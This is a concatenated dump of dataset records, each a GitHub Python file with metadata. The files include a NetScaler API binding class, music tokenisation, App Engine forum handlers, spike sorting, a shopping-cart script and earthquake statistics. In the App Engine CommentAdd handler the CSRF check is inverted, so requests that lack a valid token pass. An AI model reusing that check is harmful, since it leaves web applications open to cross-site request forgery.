INTERCEPT_REQ, CLIENTCERT_REQ, SERVERHELLO_RES, SERVERCERT_RES, SERVERHELLO_DONE_RES, REQUEST.\n\t\t\"\"\"\n\t\ttry :\n\t\t\treturn self._type\n\t\texcept Exception as e:\n\t\t\traise e\n\n\t@type.setter\n\tdef type(self, type) :\n\t\tr\"\"\"Bind point to which to bind the policy. Possible Values: HANDSHAKE_REQ, HANDSHAKE_RES, CLIENTHELLO_REQ, CLIENTCERT_REQ, SERVERHELLO_RES, SERVERCERT_RES, SERVERHELLO_DONE_RES and REQUEST. These bindpoints mean:\n\t\t1. HANDSHAKE_REQ: Policy evaluation will be done at the end of handshake on request side (request side means between client and NetScaler)\n\t\t2. HANDSHAKE_RES: Policy evaluation will be done at the end of hadnshake on response side (response side means between Netscaler and server)\n\t\t3. INTERCEPT_REQ: Policy evaluation will be done after receiving Client Hello on request side.\n\t\t4. CLIENTCERT_REQ: Policy evaluation will be done after receiving Client Certificate on request side.\n\t\t5. SERVERHELLO_RES: Policy evaluation will be done after receiving Server Hello on response side.\n\t\t6. SERVERCERT_RES: Policy evaluation will be done after receiving Server Certificate on response side.\n\t\t7. SERVERHELLO_DONE_RES: Policy evaluation will be done after receiving Server Hello Done on response side.\n\t\t8. REQUEST: Policy evaluation will be done at appplication above SSL. This bindpoint is default and is used for actions based on clientauth and client cert. Default value: REQUEST Possible values = HANDSHAKE_REQ, HANDSHAKE_RES, INTERCEPT_REQ, CLIENTCERT_REQ, SERVERHELLO_RES, SERVERCERT_RES, SERVERHELLO_DONE_RES, REQUEST\n\t\t\"\"\"\n\t\ttry :\n\t\t\tself._type = type\n\t\texcept Exception as e:\n\t\t\traise e\n\n\t@property\n\tdef labeltype(self) :\n\t\tr\"\"\"Type of policy label invocation. Possible values = vserver, service, policylabel.\n\t\t\"\"\"\n\t\ttry :\n\t\t\treturn self._labeltype\n\t\texcept Exception as e:\n\t\t\traise e\n\n\t@labeltype.setter\n\tdef labeltype(self, labeltype) :\n\t\tr\"\"\"Type of policy label invocation. Possible values = vserver, service, policylabel\n\t\t\"\"\"\n\t\ttry :\n\t\t\tself._labeltype = labeltype\n\t\texcept Exception as e:\n\t\t\traise e\n\n\t@property\n\tdef polinherit(self) :\n\t\tr\"\"\"Whether the bound policy is a inherited policy or not. Minimum value = 0 Maximum value = 254.\n\t\t\"\"\"\n\t\ttry :\n\t\t\treturn self._polinherit\n\t\texcept Exception as e:\n\t\t\traise e\n\n\tdef _get_nitro_response(self, service, response) :\n\t\tr\"\"\" converts nitro response into object and returns the object array in case of get request.\n\t\t\"\"\"\n\t\ttry :\n\t\t\tresult = service.payload_formatter.string_to_resource(sslvserver_sslpolicy_binding_response, response, self.__class__.__name__)\n\t\t\tif(result.errorcode != 0) :\n\t\t\t\tif (result.errorcode == 444) :\n\t\t\t\t\tservice.clear_session(self)\n\t\t\t\tif result.severity :\n\t\t\t\t\tif (result.severity == \"ERROR\") :\n\t\t\t\t\t\traise nitro_exception(result.errorcode, str(result.message), str(result.severity))\n\t\t\t\telse :\n\t\t\t\t\traise nitro_exception(result.errorcode, str(result.message), str(result.severity))\n\t\t\treturn result.sslvserver_sslpolicy_binding\n\t\texcept Exception as e :\n\t\t\traise e\n\n\tdef _get_object_name(self) :\n\t\tr\"\"\" Returns the value of object identifier argument\n\t\t\"\"\"\n\t\ttry :\n\t\t\tif self.vservername is not None :\n\t\t\t\treturn str(self.vservername)\n\t\t\treturn None\n\t\texcept Exception as e :\n\t\t\traise e\n\n\n\n\t@classmethod\n\tdef add(cls, client, resource) :\n\t\ttry :\n\t\t\tif resource and type(resource) is not list :\n\t\t\t\tupdateresource = sslvserver_sslpolicy_binding()\n\t\t\t\tupdateresource.vservername = resource.vservername\n\t\t\t\tupdateresource.policyname = resource.policyname\n\t\t\t\tupdateresource.priority = resource.priority\n\t\t\t\tupdateresource.gotopriorityexpression = resource.gotopriorityexpression\n\t\t\t\tupdateresource.invoke = resource.invoke\n\t\t\t\tupdateresource.labeltype = resource.labeltype\n\t\t\t\tupdateresource.labelname = resource.labelname\n\t\t\t\treturn updateresource.update_resource(client)\n\t\t\telse :\n\t\t\t\tif resource and len(resource) > 0 :\n\t\t\t\t\tupdateresources = [sslvserver_sslpolicy_binding() for _ in range(len(resource))]\n\t\t\t\t\tfor i in range(len(resource)) :\n\t\t\t\t\t\tupdateresources[i].vservername = resource[i].vservername\n\t\t\t\t\t\tupdateresources[i].policyname = resource[i].policyname\n\t\t\t\t\t\tupdateresources[i].priority = resource[i].priority\n\t\t\t\t\t\tupdateresources[i].gotopriorityexpression = resource[i].gotopriorityexpression\n\t\t\t\t\t\tupdateresources[i].invoke = resource[i].invoke\n\t\t\t\t\t\tupdateresources[i].labeltype = resource[i].labeltype\n\t\t\t\t\t\tupdateresources[i].labelname = resource[i].labelname\n\t\t\t\treturn cls.update_bulk_request(client, updateresources)\n\t\texcept Exception as e :\n\t\t\traise e\n\n\t@classmethod\n\tdef delete(cls, client, resource) :\n\t\ttry :\n\t\t\tif resource and type(resource) is not list :\n\t\t\t\tdeleteresource = sslvserver_sslpolicy_binding()\n\t\t\t\tdeleteresource.vservername = resource.vservername\n\t\t\t\tdeleteresource.policyname = resource.policyname\n\t\t\t\tdeleteresource.priority = resource.priority\n\t\t\t\treturn deleteresource.delete_resource(client)\n\t\t\telse :\n\t\t\t\tif resource and len(resource) > 0 :\n\t\t\t\t\tdeleteresources = [sslvserver_sslpolicy_binding() for _ in range(len(resource))]\n\t\t\t\t\tfor i in range(len(resource)) :\n\t\t\t\t\t\tdeleteresources[i].vservername = resource[i].vservername\n\t\t\t\t\t\tdeleteresources[i].policyname = resource[i].policyname\n\t\t\t\t\t\tdeleteresources[i].priority = resource[i].priority\n\t\t\t\treturn cls.delete_bulk_request(client, deleteresources)\n\t\texcept Exception as e :\n\t\t\traise e\n\n\t@classmethod\n\tdef get(cls, service, vservername=\"\", option_=\"\") :\n\t\tr\"\"\" Use this API to fetch sslvserver_sslpolicy_binding resources.\n\t\t\"\"\"\n\t\ttry :\n\t\t\tif not vservername :\n\t\t\t\tobj = sslvserver_sslpolicy_binding()\n\t\t\t\tresponse = obj.get_resources(service, option_)\n\t\t\telse :\n\t\t\t\tobj = sslvserver_sslpolicy_binding()\n\t\t\t\tobj.vservername = vservername\n\t\t\t\tresponse = obj.get_resources(service)\n\t\t\t\treturn response\n\t\texcept Exception as e:\n\t\t\traise e\n\n\t@classmethod\n\tdef get_filtered(cls, service, vservername, filter_) :\n\t\tr\"\"\" Use this API to fetch filtered set of sslvserver_sslpolicy_binding resources.\n\t\tFilter string should be in JSON format.eg: \"port:80,servicetype:HTTP\".\n\t\t\"\"\"\n\t\ttry :\n\t\t\tobj = sslvserver_sslpolicy_binding()\n\t\t\tobj.vservername = vservername\n\t\t\toption_ = options()\n\t\t\toption_.filter = filter_\n\t\t\tresponse = obj.getfiltered(service, option_)\n\t\t\treturn response\n\t\texcept Exception as e:\n\t\t\traise e\n\n\t@classmethod\n\tdef count(cls, service, vservername) :\n\t\tr\"\"\" Use this API to count sslvserver_sslpolicy_binding resources configued on NetScaler.\n\t\t\"\"\"\n\t\ttry :\n\t\t\tobj = sslvserver_sslpolicy_binding()\n\t\t\tobj.vservername = vservername\n\t\t\toption_ = options()\n\t\t\toption_.count = True\n\t\t\tresponse = obj.get_resources(service, option_)\n\t\t\tif response :\n\t\t\t\treturn response[0].__dict__['___count']\n\t\t\treturn 0\n\t\texcept Exception as e:\n\t\t\traise e\n\n\t@classmethod\n\tdef count_filtered(cls, service, vservername, filter_) :\n\t\tr\"\"\" Use this API to count the filtered set of sslvserver_sslpolicy_binding resources.\n\t\tFilter string should be in JSON format.eg: \"port:80,servicetype:HTTP\".\n\t\t\"\"\"\n\t\ttry :\n\t\t\tobj = sslvserver_sslpolicy_binding()\n\t\t\tobj.vservername = vservername\n\t\t\toption_ = options()\n\t\t\toption_.count = True\n\t\t\toption_.filter = filter_\n\t\t\tresponse = obj.getfiltered(service, option_)\n\t\t\tif response :\n\t\t\t\treturn response[0].__dict__['___count']\n\t\t\treturn 0\n\t\texcept Exception as e:\n\t\t\traise e\n\n\tclass Ecccurvename:\n\t\tALL = \"ALL\"\n\t\tP_224 = \"P_224\"\n\t\tP_256 = \"P_256\"\n\t\tP_384 = \"P_384\"\n\t\tP_521 = \"P_521\"\n\n\tclass Ocspcheck:\n\t\tMandatory = \"Mandatory\"\n\t\tOptional = \"Optional\"\n\n\tclass Crlcheck:\n\t\tMandatory = \"Mandatory\"\n\t\tOptional = \"Optional\"\n\n\tclass Type:\n\t\tHANDSHAKE_REQ = \"HANDSHAKE_REQ\"\n\t\tHANDSHAKE_RES = \"HANDSHAKE_RES\"\n\t\tINTERCEPT_REQ = \"INTERCEPT_REQ\"\n\t\tCLIENTCERT_REQ = \"CLIENTCERT_REQ\"\n\t\tSERVERHELLO_RES = \"SERVERHELLO_RES\"\n\t\tSERVERCERT_RES = \"SERVERCERT_RES\"\n\t\tSERVERHELLO_DONE_RES = \"SERVERHELLO_DONE_RES\"\n\t\tREQUEST = \"REQUEST\"\n\n\tclass Labeltype:\n\t\tvserver = \"vserver\"\n\t\tservice = \"service\"\n\t\tpolicylabel = \"policylabel\"\n\nclass sslvserver_sslpolicy_binding_response(base_response) :\n\tdef __init__(self, length=1) :\n\t\tself.sslvserver_sslpolicy_binding = []\n\t\tself.errorcode = 0\n\t\tself.message = \"\"\n\t\tself.severity = \"\"\n\t\tself.sessionid = \"\"\n\t\tself.sslvserver_sslpolicy_binding = [sslvserver_sslpolicy_binding() for _ in range(length)]\n\n","repo_name":"MayankTahil/nitro-ide","sub_path":"nitro-python-1.0/nssrc/com/citrix/netscaler/nitro/resource/config/ssl/sslvserver_sslpolicy_binding.py","file_name":"sslvserver_sslpolicy_binding.py","file_ext":"py","file_size_in_byte":12851,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"19"}
+{"seq_id":"2661690726","text":"import os\nimport torch\nimport numpy as np\nimport copy\nimport partitura as pt\nfrom einops import rearrange, repeat\nimport pandas as pd\nfrom miditoolkit import MidiFile\nfrom einops import repeat\nimport utils as utils\n\n\ndef clip_segs(tokens, cfg):\n \"\"\"clip the token sequence according to segmentation scheme\n\n Return:\n seg_tokens: np.array: (n_segs, seg_length)\n \"\"\"\n\n \"\"\"choose the number of segments to clip\"\"\"\n if cfg.segmentation.seg_type == \"fix_num\":\n n_segs = cfg.experiment.n_segs\n l = int(len(tokens) / cfg.experiment.n_segs)\n elif cfg.segmentation.seg_type == \"fix_size\":\n n_segs = int(len(tokens) / cfg.sequence.max_seq_len) + 1\n l = cfg.sequence.max_seq_len\n\n\n \"\"\"Clip rolls into segments and add padding\"\"\"\n seg_tokens = []\n for i in range(n_segs): \n seg_tokens.append(tokens[ i*l: i*l+l ][:cfg.sequence.max_seq_len])\n return seg_tokens\n\n\ndef pad_segs(seg_tokens, cfg):\n if cfg.sequence.mid_encoding == \"CPWord\":\n seg_tokens = [np.concatenate([seg_token, repeat(np.array([0] * 6), 'd -> k d', k=( cfg.sequence.max_seq_len - len(seg_token)))])\n for seg_token in seg_tokens if seg_token] \n seg_tokens = [np.pad(seg_token, (0, cfg.sequence.max_seq_len - len(seg_token)), mode=\"constant\", constant_values=0)\n for seg_token in seg_tokens]\n return np.array(seg_tokens) # ()\n \n\ndef perfmidi_to_sequence(path, tokenizer, cfg):\n \"\"\"Process MIDI events to sequences using miditok\n - segment the sequence in various segmentation scheme, and then pad the sequences\n \n Returns:\n seg_tokens: (n_segs, max_seq_len)\n \"\"\"\n midi = MidiFile(path)\n if cfg.segmentation.seg_type == \"fix_time\":\n \"\"\"For the fix_time segmentation, we get different segments in midi and then tokenize them\"\"\"\n seg_tokens, i = [], 0\n mapping = midi.get_tick_to_time_mapping()\n instrument_track = copy.deepcopy(midi.instruments[0])\n while True:\n # _midi = copy.deepcopy(midi)\n # instrument_track = _midi.instruments[0]\n start, end = (i)*cfg.segmentation.seg_time, (i+1)*cfg.segmentation.seg_time \n midi.instruments[0].notes = [note for note in instrument_track.notes \n if (note.start < len(mapping) and \n (mapping[note.start] < end and (mapping[note.start]) > start))]\n if not midi.instruments[0].notes:\n break\n print(len(midi.instruments[0].notes))\n tokens = tokenizer(midi)[0]\n utils.try_save_BPE_tokens(tokenizer, tokens, cfg)\n if cfg.sequence.BPE:\n tokens = tokenizer.apply_bpe(tokens)\n seg_tokens.append(tokens[:cfg.sequence.max_seq_len])\n i += 1\n else:\n tokens = tokenizer(midi)[0] # (l, )\n if cfg.sequence.BPE:\n tokens = tokenizer.apply_bpe(tokens)\n seg_tokens = clip_segs(tokens, cfg)\n\n seg_tokens = pad_segs(seg_tokens, cfg)\n assert(seg_tokens.shape[1] == cfg.sequence.max_seq_len)\n return seg_tokens # (s l)\n\n\ndef musicxml_to_sequence(path, tokenizer, cfg):\n \"\"\"Process musicxml to sequences using miditok\"\"\"\n import warnings\n warnings.filterwarnings(\"ignore\") # mute partitura warnings\n\n try:\n score = pt.load_musicxml(path)\n if \"Kreisleriana,_Op._16/VIII._Schnell_und_spielend/\" in path:\n raise RuntimeError\n except Exception as e:\n print(\"Failed on score {} with exception {}\".format(os.path.splitext(os.path.basename(path))[0], e))\n return None\n \n if cfg.segmentation.seg_type == \"fix_time\":\n \"\"\"For the fix_time segmentation, we get different segments in score and then tokenize them\"\"\"\n seg_tokens, i = [], 0\n for i in range(int(score.note_array()['onset_beat'].max() / cfg.segmentation.seg_beat) + 1):\n tokens = tokenizer.track_to_tokens(score, start_end_beat=(i*cfg.segmentation.seg_beat, (i+1)*cfg.segmentation.seg_beat))\n utils.try_save_BPE_tokens(tokenizer, tokens, cfg)\n if cfg.sequence.BPE:\n tokens = tokenizer.apply_bpe(tokens)\n seg_tokens.append(tokens[:cfg.sequence.max_seq_len])\n print(len(tokens))\n else:\n tokens = tokenizer.track_to_tokens(score)\n if cfg.sequence.BPE:\n tokens = tokenizer.apply_bpe(tokens)\n seg_tokens = clip_segs(tokens, cfg) \n\n seg_tokens = pad_segs(seg_tokens, cfg)\n\n assert(seg_tokens.shape[1] == cfg.sequence.max_seq_len)\n return seg_tokens # (s l)\n\n\ndef batch_to_sequence(batch, cfg, device, tokenizer):\n \"\"\"Map the batch to input token sequences \n\n Args:\n batch (2, b): ([path, path, ...], [label, label, ...])\n Returns: (matrix, label)\n batch_sequence: (b, )\n batch_label: (b, )\n \"\"\"\n files, labels = batch\n b = len(batch[0])\n batch_sequence, batch_labels = [], []\n\n for idx, (path, l) in enumerate(zip(files, labels)):\n # print(path)\n recompute = True\n if cfg.experiment.load_data: # load existing data\n res = utils.load_data(path, cfg)\n if type(res) == np.ndarray: # keep computing if not exist\n seg_sequences = res\n recompute = False\n\n # events = tokenizer.tokens_to_events(list(seg_sequences[0]))\n if recompute:\n if cfg.experiment.input_format == \"perfmidi\":\n seg_sequences = perfmidi_to_sequence(path, tokenizer, cfg)\n elif cfg.experiment.input_format == \"musicxml\":\n res = musicxml_to_sequence(path, tokenizer, cfg)\n if type(res) == np.ndarray:\n seg_sequences = res\n else: # in case that the xml has parsing error, we skip and copy existing data at the end.\n continue\n\n utils.save_data(path, seg_sequences, cfg)\n\n batch_sequence.append(seg_sequences)\n batch_labels.append(l)\n \n if cfg.experiment.tmp:\n example = batch_sequence[10][0, :50]\n for e in tokenizer.tokens_to_events(example):\n print(e)\n # byte_counts = []\n # for piece_segments in batch_sequence:\n # total_bytes = 0\n # for ss in piece_segments:\n # total_bytes += np.array(ss).nbytes\n # byte_counts.append(total_bytes)\n # byte_counts = np.array(byte_counts)\n batch_sequence, batch_labels = utils.pad_batch(b, cfg, device, batch_sequence, batch_labels)\n batch_sequence = torch.tensor(np.array(batch_sequence), device=device, dtype=torch.float32) \n return batch_sequence, batch_labels\n","repo_name":"anusfoil/SymRep","sub_path":"converters/sequence.py","file_name":"sequence.py","file_ext":"py","file_size_in_byte":6728,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"19"}
+{"seq_id":"36052795392","text":"from handlers.base import BaseHandler\nfrom google.appengine.api import users, memcache\nfrom models.models import Topic, Comment\nimport uuid\nimport datetime\n\nclass TopicAdd(BaseHandler):\n def get(self):\n csrf_token = str(uuid.uuid4())\n memcache.add(key=csrf_token, value=True, time=600)\n params = {\"csrf_token\": csrf_token}\n return self.render_template(\"topic_add.html\", params=params)\n\n def post(self):\n user = users.get_current_user()\n\n csrf_token = self.request.get(\"csrf_token\")\n mem_token = memcache.get(key=csrf_token)\n\n if not mem_token:\n return self.write(\"Hacker at the doors\")\n\n title = self.request.get(\"title\")\n text = self.request.get(\"text\")\n\n new_topic = Topic(title=title, content=text, author_email=user.email())\n new_topic.put()\n\n return self.redirect_to(\"topic-details\", topic_id=new_topic.key.id())\n\n\nclass TopicDetails(BaseHandler):\n def get(self, topic_id):\n csrf_token = str(uuid.uuid4())\n memcache.add(key=csrf_token, value=True, time=600)\n\n topic = Topic.get_by_id(int(topic_id))\n comment = Comment.query(Comment.topic_id == topic.key.id()).order(Comment.created).fetch()\n\n params = {\"topic\": topic, \"comment\": comment, \"csrf_token\": csrf_token}\n\n return self.render_template(\"topic_details.html\", params=params)\n\n\nclass CommentAdd(BaseHandler):\n def post(self, topic_id):\n user = users.get_current_user()\n time = datetime.datetime.now()\n\n csrf_token = self.request.get(\"csrf_token\")\n mem_token = memcache.get(key=csrf_token)\n\n if mem_token:\n return self.write(\"Hacker at the doors\")\n\n comment = self.request.get(\"comment\")\n topic = Topic.get_by_id(int(topic_id))\n new_comment = Comment(content=comment, topic_id=topic.key.id(), author_email=user.email(),\n topic_title=topic.title, created=time)\n new_comment.put()\n\n return self.redirect_to(\"topic-details\", topic_id=topic.key.id())","repo_name":"RokP85/7.DN","sub_path":"wd2-boilerplate-master/handlers/topics.py","file_name":"topics.py","file_ext":"py","file_size_in_byte":2072,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}
+{"seq_id":"42244718093","text":"\nimport numpy as np\nimport random as rand\nfrom matplotlib import pyplot as plt\nfrom peak_detect import detect_peaks\nfrom time import time\n\nfrom sklearn import metrics\nfrom sklearn.cluster import KMeans\nfrom sklearn.decomposition import PCA\nfrom sklearn.preprocessing import scale\nfrom scipy.spatial import distance\nimport matplotlib as mpl\nfrom matplotlib.pyplot import cm \n\n\n#########################################################\n# The following code apply K-means algorithms to signal\n# by three steps: spike detection, alignment of spikes and k-means algorithm\n\n\n# Question 1: we have to manually set the window length/convolution window, \n# since we use convolution window to find spike, the convolution result may not give\n# us the best estimate\n\n# Question 2: local maximum determines our result in k means\n\n###########################################################################\n\n# process_spike function will detect spikes in input signal and align them :\n# input: \n# signal: the input signal\n# window_len: the manually set length for window in convolution\n# take_window_len: chop off length for spike\n# window_height: the manually set height for window in convolution\n# noise_level: the lower bound parameter in the find local maxima function\n\n# output: the aligned spikes in a 2-D array detected_spikes\n\ndef process_spike(signal, window_len, take_window_len,noise_level, window_height=2):\n\t\n\t################################################\n\t# Step 1: take the absolute value of signal\n\t\n\tsignal_abs=map(abs,signal)\n\t#signal_abs=np.array(signal)**2\n\t\n\t# Step 2: take convolution of the absolute value\n\tweights = np.repeat(window_height, window_len)\n\tconvolution=np.convolve(weights,signal_abs,'same')\n\tconvolution=convolution/window_len\n\n\tplt.plot(convolution)\n\tplt.show()\n\n\t# Step 3: find the indices of local maxima of the convolution\n\tlocal_max=detect_peaks(convolution, mph=noise_level*5, mpd=window_len,threshold=0, edge='rising',\n kpsh=False, valley=False, show=False)\n\n\t# Step 4: locate/save spike vectors\n\tm=len(local_max)\n\tn=take_window_len\n\tdetected_spikes=np.zeros((m,n))\n\tindex=0\n\tfor item in local_max:\n\t\tdetected_spikes[index]=signal[item-take_window_len/2:item+take_window_len/2]\n\t\tindex=index+1\n\tdetected_spikes1=detected_spikes.copy()\n\n\t#return detected_spikes\n\n\t# Step 5: align spikes \n\tk=rand.randint(0,m-1)\n\tmax_location=detected_spikes[k].argmax(axis=0)\n\tfor i in range(0,m-1):\n\t\tspike_max_location=detected_spikes[i].argmax(axis=0)\n\t\tdistance=max_location-spike_max_location\n\t\tdetected_spikes[i]=np.roll(detected_spikes[i],distance)\n\n\treturn detected_spikes\n\n\n\n#######################################################################\n# K_means_spikeDetection function will perform k-means algorithm on \n# aligned spikes\n\n\ndef k_means_spikeDetection(aligned_spikes,num_cluster,iterations=20):\n\t# Initialize spikes with lables\n\tm=aligned_spikes.shape[0]#num of points\n\tn=aligned_spikes.shape[1]#dim of the points\n\t\n\t# Take initialize centers\n\tk=np.random.permutation(m)\n\tinitial_center=np.zeros((num_cluster,n))\n\n\t#return initial_center\n\tfor num in range(num_cluster):\n\t\tinitial_center[num]=aligned_spikes[k[num]]\n\n\t# Main loop:\n\tcenter_vectors=initial_center\n\tfor ite in range(iterations):\n\t\t\n\t\t# Determine clusters by computing the Eculidean distance\n\t\tclusters_distance=distance.cdist(aligned_spikes,center_vectors,'euclidean',p=2)\n\t\tlabel=clusters_distance.argmin(axis=1)\n\t\t\n\t\tclassified_spikes=np.c_[aligned_spikes,label]\n\n\t\t# assign each vector in aligned_spikes a group\t\t\n\t\tfor index in range(0,num_cluster):\n\t\t\tcluster_vector=aligned_spikes[label==index]\n\t\t\tnumber=cluster_vector.shape[0]\n\n\t\t\t# Get new center by averaging vectors in a certain group\n\t\t\tcenter_vectors[index]=1.0/number*np.sum(cluster_vector,axis=0)\t\t\t\n\n\treturn center_vectors,label\n\n\ndef plot_kMeans_clusters(classified_spikes,center_vectors,num_cluster):\n\tcolor=cm.rainbow(np.linspace(0,1,num_cluster))\n\n\tfor i in range(num_cluster):\n\t\tplt.plot(center_vectors[i])\n\t\tplt.savefig('image/classifed_centers.png')\n\n\tfor index_i in range(0,num_cluster):\n\t\tcluster_vector=classified_spikes[classified_spikes[:,-1]==index_i]\n\t\tnumber=cluster_vector.shape[0]\n\n\t\tfor index_j in range(0,number):\n\t\t\t#plt.subplot(index)\n\t\t\tplt.plot(cluster_vector[index_j],color=color[index_i])\n\t\t\t#plt.show()\n\n\t\tplt.savefig('image/clusters.png')\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"YueXX/spike-sorting-project","sub_path":"backup_code/k_means_Eculidean2Norm.py","file_name":"k_means_Eculidean2Norm.py","file_ext":"py","file_size_in_byte":4371,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}
+{"seq_id":"21999113490","text":"goods = {1:'肥皂',2:'牙刷',3:'牙膏',4:'毛巾',5:'卫衣',6:'短袖',7:'长裤',8:'短裤',9:'饮料',10:'零食',11:'鞋子',12:'马自达',13:'劳斯莱斯'}\ngoodsKey = tuple(goods.keys())\ngoodsValue = list(goods.values())\nmoney = {1: 3, 2: 5, 3: 8, 4: 5, 5: 30, 6: 20, 7: 30, 8: 20, 9: 3, 10: 6, 11: 25,12:200000,13:5000000}\nface = {1:'购物',2:'结账',3:'查看余额',4:'购物清单',5:'充值'}\nshop = list()\ncash = 100\n\nfile = open('shopHistory.txt', 'w')\nfile.write('商品列表:')\nfile.write(\"\\n\")\nfor i in goodsValue:\n file.write(str(i))\n file.write(' ')\nfile.write(\"\\n\")\n\ndef Face():\n print(' ')\n print(face)\n print(' ')\n a = eval(input(\"请选择想要操作的数字:\"))\n if a == 1:\n Shop()\n elif a == 2:\n Pay()\n elif a == 3:\n print(' ')\n print(\"{}元\".format(cash))\n Face()\n elif a == 4:\n Remove()\n elif a == 5:\n Cash()\n else:\n print(' ')\n print(\"输入错误,请重新输入:\")\n Face()\n\ndef Shop():\n b = 1\n while b != 0:\n print(' ')\n print(goods)\n print(' ')\n b = eval(input(\"请选择你想购买的商品编号(0:退出):\"))\n shop.append(goodsKey[b-1])\n continue\n shop.pop(-1)\n Face()\n\ndef Pay():\n global cash\n pay = 0\n for m in shop:\n pay = pay + money[m]\n print(' ')\n p = eval(input(\"{}元,是否支付(1:支付,2:返回)\".format(pay)))\n if p == 1:\n if pay < cash:\n file.write('购买商品:')\n file.write(\"\\n\")\n for i in shop:\n file.write((goods[i]))\n file.write(' ')\n file.write(\"\\n\")\n print(' ')\n pa = eval(input(\"支付成功!是否退出(1:退出,2:返回界面)\"))\n cash = cash - pay\n if pa == 1:\n print(' ')\n print(\"祝您生活愉快!\")\n elif pa == 2:\n shop.clear()\n Face()\n else:\n print(' ')\n print(\"输入失败,请重新输入\")\n Pay()\n elif pay >= cash:\n print(' ')\n print(\"余额不足,请充值\")\n Face()\n elif p == 2:\n Face()\n else:\n print(' ')\n print(\"输入错误,请重新输入:\")\n Pay()\n\ndef Cash():\n print(' ')\n c = eval(input(\"请输入充值金额:\"))\n global cash\n cash = cash + c\n print(' ')\n print(\"充值成功!\")\n Face()\n\ndef Remove():\n for i in shop:\n print(goods[i])\n print(' ')\n s = eval(input(\"是否删除商品:(1:是,2:否):\"))\n if s == 1:\n print(' ')\n ss = eval(input(\"请输入想要删除的商品编号:(0:退出)\"))\n try:\n shop.remove(ss)\n except:\n print(' ')\n print(\"该商品不在购物车中\")\n Remove()\n print(' ')\n print(\"删除成功!\")\n Face()\n elif s == 2:\n Face()\n else:\n print(' ')\n print(\"输入错误,请重新输入:\")\n Remove()\ndef main():\n print(' ')\n print(\"《购物车》\")\n Face()\n file.close()\n\nmain()","repo_name":"Dzy0121/Gitspace","sub_path":"shopping.py","file_name":"shopping.py","file_ext":"py","file_size_in_byte":3253,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}
+{"seq_id":"3399076289","text":"# 1835] 카드\n\nfrom collections import deque\nn = int(input())\ndq=deque()\nfor i in range(n,0,-1):\n dq.appendleft(i)\n # dq.rotate()\n for _ in range(i):\n dq.appendleft(dq.pop())\n \nprint(*dq)\n","repo_name":"devryyeong/problem-solving","sub_path":"BOJ/1835.py","file_name":"1835.py","file_ext":"py","file_size_in_byte":198,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}
+{"seq_id":"23484749458","text":"import pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n\ndef GraphOmoriUtsu(df, gap, calcul_OU, ms_max_mag, foreshock):\n\n \"\"\"\n Fonction qui crée un graphe Omori-Utsu et calcule les K- & p-values\n :param df: données (table pandas)\n :param gap: taille des bars d'histograme (en s)\n :param calcul_OU: calcule de la loi OU (1) ou non (0)\n :param ms_max_mag: 1 = le jour du main shock est considéré comme celui ayant la plus grande magnitude max\n 0 = le jour du main shock est considéré comme celui ayant le plus grand nombre de séisme\n :param foreshock: 1 = analyse des précurseurs\n 0 = analyse des répliques\n :return: objet graphe qui trace le nombre de séisme par jour (ligne) et la magnitude max par jour (point)\n Le titre est constitué de la localisation (jour) du main shock ainsi que des K- et p-values calculées\n \"\"\"\n\n nb_gap = int((df['sec'].max() - df['sec'].min()) // gap)\n nt = []\n magmax = []\n title = 'Earthquake number and maximal magnitude per day'\n\n for i in range(nb_gap + 1):\n dfbis = df[((i * gap + df['sec'].min()) <= df['sec']) & (((i + 1) * gap + df['sec'].min()) > df['sec'])]\n nt.append(len(dfbis))\n magmax.append(dfbis['mag'].max())\n\n fig, ax1 = plt.subplots()\n x = [i for i in range(nb_gap + 1)]\n # Ordonnée de gauche : # séismes / jour\n color = 'tab:blue'\n ax1.set_xlabel('time (day)')\n ax1.set_ylabel('Earthquake # per day', color=color)\n y = nt\n ax1.plot(x, y, color=color)\n ax1.tick_params(axis='y', labelcolor=color)\n # Ordonnée de droite : magnitude max / jour\n ax2 = ax1.twinx()\n color = 'tab:red'\n ax2.set_ylabel('Max magnitude per day', color=color)\n ax2.scatter(x, magmax, s=10, color=color)\n ax2.tick_params(axis='y', labelcolor=color)\n\n if calcul_OU == 1:\n if foreshock == 1:\n a, b, idx_ms = RegressionOU_foreshock(1, nt, ms_max_mag, magmax)\n study = 'foreshocks'\n else:\n a, b, idx_ms = RegressionOU(1, nt, ms_max_mag, magmax)\n study = 'aftershocks'\n\n title = 'Main shock at ' + str(idx_ms) + ' days / p-value (' + study + ') = ' + str(round(-a, 2)) + \\\n ' / K-value = ' + str(round(10 ** b))\n\n ax1.set_title(title)\n fig.tight_layout()\n plt.show()\n\n if calcul_OU == 1:\n return a, b, idx_ms\n\n \ndef RegressionOU(c, nt, ms_max_mag, magmax):\n\n \"\"\"\n Fonction qui calcule les coefficients de la régression de la loi OU à partir des répliques\n :param c: c-value\n :param nt: liste des nombres de séisme par jour\n :param ms_max_mag: 1 = le jour du main shock est considéré comme celui ayant la plus grande magnitude max\n 0 = le jour du main shock est considéré comme celui ayant le plus grand nombre de séisme\n :param magmax: liste des magnitudes max par jour\n :return: les 2 coefficients de la régression et la localisation (jour) du main shock\n \"\"\"\n\n # Définition de main shock ?\n # 1) la magnitude la plus élevée\n if ms_max_mag == 1:\n idx_ms = magmax.index(max(magmax))\n # 2) Le nombre de séisme le plus élevé\n else:\n idx_ms = nt.index(max(nt))\n\n t = [(idx_ms + i) for i in range(len(nt) - idx_ms)]\n x = []\n y = []\n for i in range(len(nt) - idx_ms):\n if nt[i + idx_ms] != 0:\n y.append(np.log10(nt[i + idx_ms]))\n x.append(np.log10(c + t[i]))\n [a, b] = np.polyfit(x, y, 1)\n\n return a, b, idx_ms\n\n\ndef RegressionOU_foreshock(c, nt, ms_max_mag, magmax):\n \"\"\"\n Fonction qui calcule les coefficients de la régression de la loi OU à partir des précurseurs\n :param c: c-value\n :param nt: liste des nombres de séisme par jour\n :param ms_max_mag: 1 = le jour du main shock est considéré comme celui ayant la plus grande magnitude max\n 0 = le jour du main shock est considéré comme celui ayant le plus grand nombre de 